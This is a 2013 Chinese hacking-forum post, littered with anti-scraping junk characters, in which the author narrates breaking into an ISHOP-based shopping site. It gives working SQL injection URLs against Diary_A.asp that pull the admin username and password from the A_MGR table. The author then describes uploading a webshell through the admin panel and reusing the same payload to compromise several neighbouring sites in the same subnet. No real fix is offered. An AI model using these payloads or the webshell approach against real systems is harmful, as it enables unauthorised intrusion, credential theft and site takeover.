找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2231|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点) Y  J! w' a+ ]: }$ F
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
9 u- |  g. a# V( s& s' X3 \5 [8 H8 c" _# B1 j' k
习惯性的加’having1=1--# T5 j# N8 c' j, Y# U+ D2 A- q2 x

, ]5 K$ ?9 }+ ?http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
' m7 y$ T- c# ]7 c8 l* I0 |( h
0* M5 n6 E5 p5 a4 x. z4 k
$ s6 w0 X* u7 k* {+ x. I( _
爆出Diary_A.dl_Title(这时候很激动啊)! T% {. N1 r7 ^/ Q$ c8 ^2 Q1 l

/ S# Q! _, ?- Q- N& {: H; Z那么继续
' b4 ~( e( d  Z& v9 k6 Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
9 j+ i3 f2 z9 ~/ }( @  ~& t1 x7 q
+ d1 H6 w4 |5 E7 J8 T继续,一直爆下去
- z/ D, U0 U$ z' x0 ^3 V! Z6 [" i( B. R9 A2 y
爆到几个字段和表段 但是没找到需要的管理用户的字段
$ D: Z/ M& e3 C  a$ D/ ~* h% d+ d8 V' h  r% r9 f
蛋疼了 怎么办 然后去后台登陆页看源码
) |5 I; I0 M! H) U; d3 E
# B8 P5 e8 O/ g& L8 F0
' F8 |( A: N' S) A+ t2 _# ]6 g: i- o6 m
Input name= “ADUID”
' w) P* K9 ]1 Z+ xInput name= “ADPWD”; b' }3 Y. |7 T/ R0 ?
3 A1 V5 x( h' U! z! _
很幸运 找到了字段那就继续
2 A8 n- G+ x. _5 o+ P7 a  N找到之后开始爆用户% f2 Q3 J1 x; ?% d# q. ?/ [
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
# m! P" r1 H* f, m, A7 x0 b- j爆密码# {+ k+ u" U( R: _7 `8 U
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—' s# S- r+ A/ `+ f. w( c
测试了下 这个注入点只能爆到文章哪里的表 " Z3 u" L! T3 M, _

, `, X9 b5 S: r3 k# k) S. k# l头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了; c1 o- L" R3 n+ r' g
$ c& q! C4 \. |9 x0 Z5 Q# {
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
+ ^  z9 H0 b& z! i1 @2 ^9 z+ _9 O, D
473! l. N2 m" v8 ]* }& f0 n

* ~9 p9 p" c- o! e& l" a进后台
* @8 k3 l& F8 u+ Y
: b) J2 G8 S; e2 c2 N9 n
! c' e) U; n. v( N7 W  {发现几个上传点 有的地方不能上传 而且防止恶意代码4 P" R4 L7 H4 a4 j0 a# t: j

6 G/ f. Q+ t" `2 v/ `9 x6 F没办法 各种百度各种找大牛 找到一只好像可以突破的马
# U% m' H) t! ], `& n: A3 j0 ?0 d+ G2 `7 J7 C( a
! V9 ^( c$ L2 c, w5 V2 b# R( H
在系统管理那里直接上传 不过没有显示地址
0 c9 Q0 v, B4 d" S, H; Y+ i% N( U
再上传一次 抓包 搞定OK
, t7 Q7 S% W; A( ~2 M$ A; f
2 @) W- P: D- N' w' E6 z
/ J: m: q; p0 {) L# y4 E# b4 W. Y
472$ T% T5 w! n" V3 z
" @  r, l8 r" L2 K
晚上不行了 去睡觉。。。
# g- y0 V. E' [, F# \第二天刚起床 闲的没事做继续日站吧 & ]1 X8 ^* ?/ j8 p3 z( e/ y

, q: K0 B: x2 H; _7 {5 e找个站 就把这个站的旁c扫了下& v  T* r; G) A8 [3 i

. v$ g. b6 N( c  T8 g* d发现c段也有一个购物站 ,然后还和这个站的模板差不多
; m$ L9 j7 ~7 T* B
8 _+ W& J) a1 X: ^* g就找到会员登录口测试8 m9 }. \5 m: a5 t) g

$ e6 d0 v9 x- ~/ }5 G, W'and (select top 1 MGR_UID from A_MGR)>0—4 c+ @; E; A0 E1 B$ f7 t) e* \6 E* B
果断爆到了 这时候我很激动 通杀
' ^: {, K! d9 H- M+ A) `/ G* N' N! D7 [2 \6 K
再次翻c段. ]) v$ i# B! E( l' o! T9 V
+ N( J2 X9 Y1 J$ ~0 l: P9 f
翻出几个站 都成功拿下0 o. J" i. m- e# P' U, @
( ~' x( t% I: [, U
1 d! |7 g3 y. `$ P4 }

4 Y& |; o! A4 L) o修复方案:
9 k: N  S; Y$ t! z8 F2 `他们比我专业
- k& a. A9 C: u9 M/ `$ d1 I  q( W2 \; R1 N1 h& V8 e

3 x( ~/ \2 S) p% p! u4 U9 T3 F6 W5 a. G) v/ Q4 B8 w: ^! M" r8 c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表